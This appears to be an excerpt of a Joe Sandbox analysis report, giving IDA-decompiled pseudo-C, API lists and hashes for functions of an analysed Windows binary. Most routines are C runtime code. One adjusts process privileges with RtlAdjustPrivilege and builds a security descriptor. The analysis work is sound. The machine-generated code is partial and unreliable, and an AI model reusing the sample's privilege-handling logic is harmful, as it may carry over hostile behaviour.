                                                                                                                                                                                        • API String ID: 3411037476-0
                                                                                                                                                                                        • Opcode ID: e33f3bb100115732c2f51f8b4028eacb237136a35dc5d5b4a08dbeaa5a4c465a
                                                                                                                                                                                        • Instruction ID: c615545098d6516fa9f830edb3da67d83312a76b5b92c3da639d21b0285c1a85
                                                                                                                                                                                        • Opcode Fuzzy Hash: e33f3bb100115732c2f51f8b4028eacb237136a35dc5d5b4a08dbeaa5a4c465a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 60417C31A1AA4285FAC1BF11F881128E2A4FF88BB4F844435D94E677A5EF7DE4918721
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        C-Code - Quality: 46%
                                                                                                                                                                                        			E00007FF77FF7CEF28F3C(void* __eax, long long __rbx, signed int __rcx, signed int __rdx, intOrPtr* __r8, long long _a8) {
                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                        				intOrPtr* _t29;
                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t36 = __rdx;
                                                                                                                                                                                        				_a8 = __rbx;
                                                                                                                                                                                        				if (__rcx == 0) goto 0xcef28f6e;
                                                                                                                                                                                        				_t2 = _t36 - 0x20; // -32
                                                                                                                                                                                        				_t29 = _t2;
                                                                                                                                                                                        				if (_t29 - __rdx >= 0) goto 0xcef28f6e;
                                                                                                                                                                                        				E00007FF77FF7CEF25798(_t29 - __rdx, _t29);
                                                                                                                                                                                        				 *_t29 = 0xc;
                                                                                                                                                                                        				goto 0xcef28fcb;
                                                                                                                                                                                        				_t39 =  ==  ? _t29 : __rdx * __rcx;
                                                                                                                                                                                        				if (( ==  ? _t29 : __rdx * __rcx) - 0xffffffe0 > 0) goto 0xcef28f9e;
                                                                                                                                                                                        				RtlAllocateHeap(??, ??, ??); // executed
                                                                                                                                                                                        				if (_t29 != 0) goto 0xcef28fcb;
                                                                                                                                                                                        				if ( *0xcef30610 == 0) goto 0xcef28fc0;
                                                                                                                                                                                        				_t16 = E00007FF77FF7CEF28598(_t29,  ==  ? _t29 : __rdx * __rcx);
                                                                                                                                                                                        				if (_t16 != 0) goto 0xcef28f7e;
                                                                                                                                                                                        				if (__r8 == 0) goto 0xcef28f6a;
                                                                                                                                                                                        				 *__r8 = 0xc;
                                                                                                                                                                                        				goto 0xcef28f6a;
                                                                                                                                                                                        				if (__r8 == 0) goto 0xcef28fcb;
                                                                                                                                                                                        				 *__r8 = 0xc;
                                                                                                                                                                                        				return _t16;
                                                                                                                                                                                        			}







                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
• Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AllocateHeap_callnewh_errno
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 638267422-0
                                                                                                                                                                                        • Opcode ID: db9fc2e1e326bc5d9b4b370cbfe639d286153ed901eab296ebd547fe9e2fc535
                                                                                                                                                                                        • Instruction ID: a4c57febb9aac7f533963ba8a7d1c770db0483f08af04836d059d1500f8d47c8
                                                                                                                                                                                        • Opcode Fuzzy Hash: db9fc2e1e326bc5d9b4b370cbfe639d286153ed901eab296ebd547fe9e2fc535
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1911C825B0968A85FFD5AF11D644378E392AF84BF0F884630D92D276C4EF7CA5408224
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        C-Code - Quality: 27%
                                                                                                                                                                                        			E00007FF77FF7CEF2245C(void* __ecx, void* __edx, long long __rax, void* __rdx, void* __r9, char _a8) {
                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                        				char _v24;
                                                                                                                                                                                        				long _t10;
                                                                                                                                                                                        				long long _t24;
                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                        				void* _t36;
                                                                                                                                                                                        				intOrPtr _t40;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t24 = __rax;
                                                                                                                                                                                        				if (__ecx - 1 <= 0) goto 0xcef22475;
                                                                                                                                                                                        				E00007FF77FF7CEF22348(__rax, _t28,  *((intOrPtr*)(__rdx + 8)), _t36); // executed
                                                                                                                                                                                        				 *0xcef2f4e0 = _t24;
                                                                                                                                                                                        				__imp__RtlGetNtVersionNumbers();
                                                                                                                                                                                        				 *0xcef30ad0 =  *0xcef30ad0 & 0x00003fff;
                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                        				_t10 = RtlAdjustPrivilege(??, ??, ??, ??); // executed
                                                                                                                                                                                        				if (_t10 < 0) goto 0xcef224fc;
                                                                                                                                                                                        				_t26 =  <  ? 0xcef2bff0 : 0xcef2c018;
                                                                                                                                                                                        				_v16 = 2;
                                                                                                                                                                                        				 *0xcef30920 =  <  ? 0xcef2bff0 : 0xcef2c018;
                                                                                                                                                                                        				_v24 = 0xcef2be90;
                                                                                                                                                                                        				E00007FF77FF7CEF236D8(0x7ff7cef30ad1, _t28,  &_v24, 0xcef30ac8, 0xcef30ad0,  &_a8);
                                                                                                                                                                                        				_t40 =  *0xcef30920; // 0x7ff7cef2c018
                                                                                                                                                                                        				 *((intOrPtr*)(_t40 + 8))();
                                                                                                                                                                                        				_t33 =  *0xcef2f4e0; // 0x13c
                                                                                                                                                                                        				if (_t33 == 0xffffffff) goto 0xcef2250f;
                                                                                                                                                                                        				CloseHandle(??);
                                                                                                                                                                                        				return 0;
                                                                                                                                                                                        			}












                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
• Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: DescriptorHandleHeapSecurity$AddressAdjustAllocCloseCreateDaclFileInitializeModuleNumbersPrivilegeProcProcessSleepVersion
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 366963940-0
                                                                                                                                                                                        • Opcode ID: 5f5447fcf68489846dc299bc371346d0ad4ccce6d3d7bd68e5f5ed360826dd67
                                                                                                                                                                                        • Instruction ID: 289b42f6768e40693c35ce0abc1fa8d20c893549fd9226ccf8a85c09f6b7ce6c
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f5447fcf68489846dc299bc371346d0ad4ccce6d3d7bd68e5f5ed360826dd67
                                                                                                                                                                                        • Instruction Fuzzy Hash: B2110432A09A0792EAA0EF10E8550A8B360FF44734FC04232D56DA66E1DF7CE649C720
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 24%
                                                                                                                                                                                        			E00007FF77FF7CEF253DC(long* __rax) {
                                                                                                                                                                                        				void* __rbx;
                                                                                                                                                                                        				intOrPtr _t5;
                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                        				long _t8;
                                                                                                                                                                                        				long* _t21;
                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                        				long* _t23;
                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t21 = __rax;
                                                                                                                                                                                        				E00007FF77FF7CEF25880(__rax, _t22, _t26); // executed
                                                                                                                                                                                        				_t5 = E00007FF77FF7CEF27210(_t22, _t28, _t29);
                                                                                                                                                                                        				if (_t5 == 0) goto 0xcef25450;
                                                                                                                                                                                        				__imp__FlsAlloc();
                                                                                                                                                                                        				 *0xcef2e978 = _t5;
                                                                                                                                                                                        				if (_t5 == 0xffffffff) goto 0xcef25450;
                                                                                                                                                                                        				_t6 = E00007FF77FF7CEF27520(_t22, 0x7ff7cef252a8, _t26, _t28, _t29, _t30);
                                                                                                                                                                                        				_t23 = _t21;
                                                                                                                                                                                        				if (_t21 == 0) goto 0xcef25450;
                                                                                                                                                                                        				__imp__FlsSetValue();
                                                                                                                                                                                        				if (_t6 == 0) goto 0xcef25450;
                                                                                                                                                                                        				E00007FF77FF7CEF25148(_t23, _t23, _t21);
                                                                                                                                                                                        				_t8 = GetCurrentThreadId();
                                                                                                                                                                                        				_t23[2] = _t23[2] | 0xffffffff;
                                                                                                                                                                                        				 *_t23 = _t8;
                                                                                                                                                                                        				goto 0xcef25457;
                                                                                                                                                                                        				E00007FF77FF7CEF25120(_t23, _t23, _t21);
                                                                                                                                                                                        				return 0;
                                                                                                                                                                                        			}

                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 00007FF7CEF25880: _initp_misc_winsig.LIBCMT ref: 00007FF7CEF258B1
                                                                                                                                                                                          • Part of subcall function 00007FF7CEF25880: EncodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CEF28307
                                                                                                                                                                                          • Part of subcall function 00007FF7CEF27210: InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,00007FF7CEF253EC,?,?,00000000,00007FF7CEF2444C), ref: 00007FF7CEF27255
                                                                                                                                                                                        • FlsAlloc.KERNEL32(?,?,00000000,00007FF7CEF2444C), ref: 00007FF7CEF253F7
                                                                                                                                                                                          • Part of subcall function 00007FF7CEF27520: Sleep.KERNEL32(?,?,?,00007FF7CEF25233,?,?,?,00007FF7CEF257A1,?,?,?,?,00007FF7CEF242F5), ref: 00007FF7CEF27565
                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,00000000,00007FF7CEF2444C), ref: 00007FF7CEF25428
                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00007FF7CEF2543C
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: _lock$AllocCountCriticalCurrentEncodeInitializePointerSectionSleepSpinThreadValue_initp_misc_winsig
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3311150041-0
                                                                                                                                                                                        • Opcode ID: 1828b3160a7fc45fe0aa8c8d66e41bf4a912bb4e31d292ea434c521c34d7a7ee
                                                                                                                                                                                        • Instruction ID: f1fc182e917d9a6f5da5a43d94571f317ad44158d1f77f8adcb6fb062a6a553d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1828b3160a7fc45fe0aa8c8d66e41bf4a912bb4e31d292ea434c521c34d7a7ee
                                                                                                                                                                                        • Instruction Fuzzy Hash: C5018120E0960346F7D67FB59816279E2919F44771FD44730D42DA52D5EF2CF4858632
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$CreateInformationVersion
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3563531100-0
                                                                                                                                                                                        • Opcode ID: 196e626f87aaeb48684bc97888c59a56b1a0abfcc28fc9b23060c14a5b268ca3
                                                                                                                                                                                        • Instruction ID: cba26b23317ad3dd60842b9d941cf676ca2649a8f41900620e48fe14800dd36a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 196e626f87aaeb48684bc97888c59a56b1a0abfcc28fc9b23060c14a5b268ca3
                                                                                                                                                                                        • Instruction Fuzzy Hash: E4E09235E29A4283FBC4BF10A809779A250FF98760FC15034E94F22794DF3CE0458B20
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                                        			E00007FF77FF7CEF26634(void* __edi, intOrPtr* __rax, long long __rbx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                                                                                                                                        				void* __rdi;
                                                                                                                                                                                        				WCHAR* _t7;
                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                        				intOrPtr* _t22;
                                                                                                                                                                                        				intOrPtr* _t23;
                                                                                                                                                                                        				intOrPtr* _t32;
                                                                                                                                                                                        
                                                                                                                                                                                        				_a8 = __rbx;
                                                                                                                                                                                        				_a16 = __rbp;
                                                                                                                                                                                        				_a24 = __rsi;
                                                                                                                                                                                        				_t7 = GetEnvironmentStringsW();
                                                                                                                                                                                        				_t32 = __rax;
                                                                                                                                                                                        				if (__rax == 0) goto 0xcef266a4;
                                                                                                                                                                                        				if ( *__rax == 0) goto 0xcef2666f;
                                                                                                                                                                                        				_t22 = __rax + 2;
                                                                                                                                                                                        				if ( *_t22 != 0) goto 0xcef2665d;
                                                                                                                                                                                        				_t23 = _t22 + 2;
                                                                                                                                                                                        				if ( *_t23 != 0) goto 0xcef2665d;
                                                                                                                                                                                        				_t37 = _t7 - __edi + 2;
                                                                                                                                                                                        				E00007FF77FF7CEF274A0(__rbx, _t7 - __edi + 2, __rax, __rsi); // executed
                                                                                                                                                                                        				if (_t23 == 0) goto 0xcef26698;
                                                                                                                                                                                        				E00007FF77FF7CEF27640(_t14, _t23, _t23, _t32, _t37);
                                                                                                                                                                                        				return FreeEnvironmentStringsW(??);
                                                                                                                                                                                        			}

                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: EnvironmentStrings$Free
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3328510275-0
                                                                                                                                                                                        • Opcode ID: c9ffd7a6a926fd1b1184d0830866c1af29c1caadf3e0be99496d7649fc07dc5a
                                                                                                                                                                                        • Instruction ID: a5e06b09ff576c64d065893b65d30fc32ae37c95202de33f179124645b709490
                                                                                                                                                                                        • Opcode Fuzzy Hash: c9ffd7a6a926fd1b1184d0830866c1af29c1caadf3e0be99496d7649fc07dc5a
                                                                                                                                                                                        • Instruction Fuzzy Hash: D2018F52E0974285EEA0BF56A451029AAA0EF48BE0F8A4430DA4D1BB86EF2CE4808710
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 61%
                                                                                                                                                                                        			E00007FF77FF7CEF25880(intOrPtr* __rax, void* __rbx, void* __rdx, long long _a8) {
                                                                                                                                                                                        				void* _t3;
                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                        				long long* _t14;
                                                                                                                                                                                        				long long _t17;
                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                        
                                                                                                                                                                                        				E00007FF77FF7CEF25114(); // executed
                                                                                                                                                                                        				E00007FF77FF7CEF2831C(E00007FF77FF7CEF28580(E00007FF77FF7CEF28588(E00007FF77FF7CEF25538(E00007FF77FF7CEF28590(_t3, __rax), __rax), __rax), __rax), __rax);
                                                                                                                                                                                        				_pop(_t17);
                                                                                                                                                                                        				goto 0xcef282fc;
                                                                                                                                                                                        				asm("int3");
                                                                                                                                                                                        				if (__rax - __rdx >= 0) goto 0xcef258f6;
                                                                                                                                                                                        				_a8 = _t17;
                                                                                                                                                                                        				_t14 =  *((intOrPtr*)(__rax));
                                                                                                                                                                                        				if (_t14 == 0) goto 0xcef258e3;
                                                                                                                                                                                        				_t9 =  *_t14(_t28);
                                                                                                                                                                                        				if (__rax + 8 - __rdx < 0) goto 0xcef258d9;
                                                                                                                                                                                        				return _t9;
                                                                                                                                                                                        			}









                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: EncodePointer_initp_misc_winsig
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2349294043-0
                                                                                                                                                                                        • Opcode ID: bfa8839ea546c11a2e1db89dec259032d6760ab63d3fad3f8e77d06c4ae8978b
                                                                                                                                                                                        • Instruction ID: ff259853ea7976e03d54b967cb8baef973e7848a8071ffeb49c9830af8636233
                                                                                                                                                                                        • Opcode Fuzzy Hash: bfa8839ea546c11a2e1db89dec259032d6760ab63d3fad3f8e77d06c4ae8978b
                                                                                                                                                                                        • Instruction Fuzzy Hash: 18E07D10E5A68B80F989BF726C6707892515F9AB70FC81431D90F2A392DF2CE5965770
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                                        			E00007FF77FF7CEF274A0(long long __rbx, void* __rcx, long long __rdi, long long __rsi) {
                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                        				intOrPtr _t12;
                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                        				long long _t33;
                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                        				int _t38;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t21 = _t35;
                                                                                                                                                                                        				 *((long long*)(_t21 + 8)) = __rbx;
                                                                                                                                                                                        				 *((long long*)(_t21 + 0x10)) = _t33;
                                                                                                                                                                                        				 *((long long*)(_t21 + 0x18)) = __rsi;
                                                                                                                                                                                        				 *((long long*)(_t21 + 0x20)) = __rdi;
                                                                                                                                                                                        				_t12 =  *0xcef30020; // 0x0
                                                                                                                                                                                        				r12d = r12d | 0xffffffff;
                                                                                                                                                                                        				_t10 = malloc(_t38); // executed
                                                                                                                                                                                        				if (_t21 != 0) goto 0xcef27500;
                                                                                                                                                                                        				if (_t12 == 0) goto 0xcef27500;
                                                                                                                                                                                        				Sleep(??);
                                                                                                                                                                                        				_t5 = _t33 + 0x3e8; // 0x3e8
                                                                                                                                                                                        				r11d = _t5;
                                                                                                                                                                                        				_t16 =  >  ? r12d : r11d;
                                                                                                                                                                                        				_t20 = ( >  ? r12d : r11d) - r12d;
                                                                                                                                                                                        				if (( >  ? r12d : r11d) != r12d) goto 0xcef274c8;
                                                                                                                                                                                        				return _t10;
                                                                                                                                                                                        			}










                                                                                                                                                                                        APIs
                                                                                                                                                                                        • malloc.LIBCMT ref: 00007FF7CEF274CB
                                                                                                                                                                                          • Part of subcall function 00007FF7CEF28CD4: _FF_MSGBANNER.LIBCMT ref: 00007FF7CEF28D04
                                                                                                                                                                                          • Part of subcall function 00007FF7CEF28CD4: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7CEF274D0,?,?,?,00007FF7CEF27395,?,?,?,00007FF7CEF2743F), ref: 00007FF7CEF28D29
                                                                                                                                                                                          • Part of subcall function 00007FF7CEF28CD4: _callnewh.LIBCMT ref: 00007FF7CEF28D42
                                                                                                                                                                                          • Part of subcall function 00007FF7CEF28CD4: _errno.LIBCMT ref: 00007FF7CEF28D4D
                                                                                                                                                                                          • Part of subcall function 00007FF7CEF28CD4: _errno.LIBCMT ref: 00007FF7CEF28D58
                                                                                                                                                                                        • Sleep.KERNEL32(?,?,?,00007FF7CEF27395,?,?,?,00007FF7CEF2743F), ref: 00007FF7CEF274DE
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: _errno$AllocateHeapSleep_callnewhmalloc
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3606348469-0
                                                                                                                                                                                        • Opcode ID: 09bcfd121daf6e22e37d43c1392b18068930b22491ba73bf7725222622581c4f
                                                                                                                                                                                        • Instruction ID: 61344b148aae002400d34169f2c2d5f4c281c650c7c1dea0a562d77e9616bce5
                                                                                                                                                                                        • Opcode Fuzzy Hash: 09bcfd121daf6e22e37d43c1392b18068930b22491ba73bf7725222622581c4f
                                                                                                                                                                                        • Instruction Fuzzy Hash: C301D632A14B8586E691AF16A400029F7A5FBC8FA0F990135EE4D27781DF3CF841C740
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • RtlEncodePointer.NTDLL(?,?,?,00007FF7CEF25967,?,?,?,00007FF7CEF244D4), ref: 00007FF7CEF2874D
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: EncodePointer
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2118026453-0
                                                                                                                                                                                        • Opcode ID: 21ca87f40e7d75410fcf8480b8a9411f1a80792b9d8a82d103126c1c06f9e053
                                                                                                                                                                                        • Instruction ID: 8972cd883f78d6fa1f05e4cce9314d1d2cf8a11bd35ce97dc709e5941efb4f67
                                                                                                                                                                                        • Opcode Fuzzy Hash: 21ca87f40e7d75410fcf8480b8a9411f1a80792b9d8a82d103126c1c06f9e053
                                                                                                                                                                                        • Instruction Fuzzy Hash: 97D01222B54E45D2EB419F11F451268A260EB847A4F998030DA4C06214DF3CC4958710
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                        			E00007FF77FF7CEF27520(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                        				long long _t29;
                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                        				long _t41;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t29 = __rdi;
                                                                                                                                                                                        				_t20 = _t37;
                                                                                                                                                                                        				 *((long long*)(_t20 + 8)) = __rbx;
                                                                                                                                                                                        				 *((long long*)(_t20 + 0x10)) = __rbp;
                                                                                                                                                                                        				 *((long long*)(_t20 + 0x18)) = __rsi;
                                                                                                                                                                                        				 *((long long*)(_t20 + 0x20)) = __rdi;
                                                                                                                                                                                        				r12d = r12d | 0xffffffff;
                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                        				_t11 = E00007FF77FF7CEF28F3C(_t10, __rbx, __rcx, __rdx, _t40); // executed
                                                                                                                                                                                        				if (_t20 != 0) goto 0xcef27585;
                                                                                                                                                                                        				_t17 =  *0xcef30020 - _t11; // 0x0
                                                                                                                                                                                        				if (_t17 <= 0) goto 0xcef27585;
                                                                                                                                                                                        				Sleep(_t41);
                                                                                                                                                                                        				_t5 = _t29 + 0x3e8; // 0x3e8
                                                                                                                                                                                        				r11d = _t5;
                                                                                                                                                                                        				_t15 =  >  ? r12d : r11d;
                                                                                                                                                                                        				_t19 = ( >  ? r12d : r11d) - r12d;
                                                                                                                                                                                        				if (( >  ? r12d : r11d) != r12d) goto 0xcef27545;
                                                                                                                                                                                        				return _t11;
                                                                                                                                                                                        			}












                                                                                                                                                                                        APIs
                                                                                                                                                                                        • Sleep.KERNEL32(?,?,?,00007FF7CEF25233,?,?,?,00007FF7CEF257A1,?,?,?,?,00007FF7CEF242F5), ref: 00007FF7CEF27565
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
